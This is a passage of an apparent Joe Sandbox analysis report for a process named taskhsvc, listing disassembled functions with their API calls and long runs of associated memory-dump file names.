    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001CDB8D, Relevance: 1.5, APIs: 1, Instructions: 33
    APIs
      • Part of subcall function 001CDB1E: free.MSVCRT ref: 001CDB6C
      • Part of subcall function 001CDB1E: __stack_chk_fail.LIBSSP-0 ref: 001CDB86
      • Part of subcall function 001CDAA5: time.MSVCRT ref: 001CDAE9
      • Part of subcall function 001CDAA5: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CDBD6), ref: 001CDB17
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CAF51), ref: 001CDC05
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C43B5, Relevance: 1.5, APIs: 1, Instructions: 33
    APIs
      • Part of subcall function 00287868: abort.MSVCRT ref: 002878D8
      • Part of subcall function 00287868: __stack_chk_fail.LIBSSP-0 ref: 00287904
    • __stack_chk_fail.LIBSSP-0 ref: 001C4415
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00326865, Relevance: 1.5, APIs: 1, Instructions: 33
    APIs
      • Part of subcall function 003267DB: __stack_chk_fail.LIBSSP-0 ref: 0032685E
    • __stack_chk_fail.LIBSSP-0 ref: 003268C7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00214518, Relevance: 1.5, APIs: 1, Instructions: 33
    APIs
      • Part of subcall function 00210D7D: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021307F), ref: 00210DD3
      • Part of subcall function 00210D7D: __stack_chk_fail.LIBSSP-0 ref: 00210E2D
      • Part of subcall function 00205A71: __stack_chk_fail.LIBSSP-0 ref: 00205CBF
      • Part of subcall function 002141A4: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021456D), ref: 00214227
      • Part of subcall function 002141A4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0021456D), ref: 00214241
      • Part of subcall function 001C262A: abort.MSVCRT ref: 001C267A
      • Part of subcall function 001C262A: event_add.LIBEVENT-2-0-5 ref: 001C26E4
      • Part of subcall function 001C262A: __stack_chk_fail.LIBSSP-0 ref: 001C2745
    • __stack_chk_fail.LIBSSP-0 ref: 00214595
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00316761, Relevance: 1.5, APIs: 1, Instructions: 28
    APIs
      • Part of subcall function 0032587B: _stati64.MSVCRT ref: 00325913
      • Part of subcall function 0032587B: free.MSVCRT ref: 0032592C
      • Part of subcall function 0032587B: __stack_chk_fail.LIBSSP-0 ref: 003259BE
      • Part of subcall function 00315AA7: rename.MSVCRT ref: 00315B14
      • Part of subcall function 00315AA7: __stack_chk_fail.LIBSSP-0 ref: 00315B24
    • __stack_chk_fail.LIBSSP-0 ref: 003167E8
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0032E7FD, Relevance: 1.5, APIs: 1, Instructions: 28
    APIs
      • Part of subcall function 0032E618: GetAdaptersAddresses.IPHLPAPI ref: 0032E706
      • Part of subcall function 0032E618: free.MSVCRT ref: 0032E728
      • Part of subcall function 0032E618: free.MSVCRT ref: 0032E7DC
      • Part of subcall function 0032E618: __stack_chk_fail.LIBSSP-0 ref: 0032E7F6
    • __stack_chk_fail.LIBSSP-0 ref: 0032E852
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00319B0B, Relevance: 1.5, APIs: 1, Instructions: 28
    APIs
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 003211F6: abort.MSVCRT ref: 0032125C
      • Part of subcall function 003211F6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00319B54), ref: 0032127B
    • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
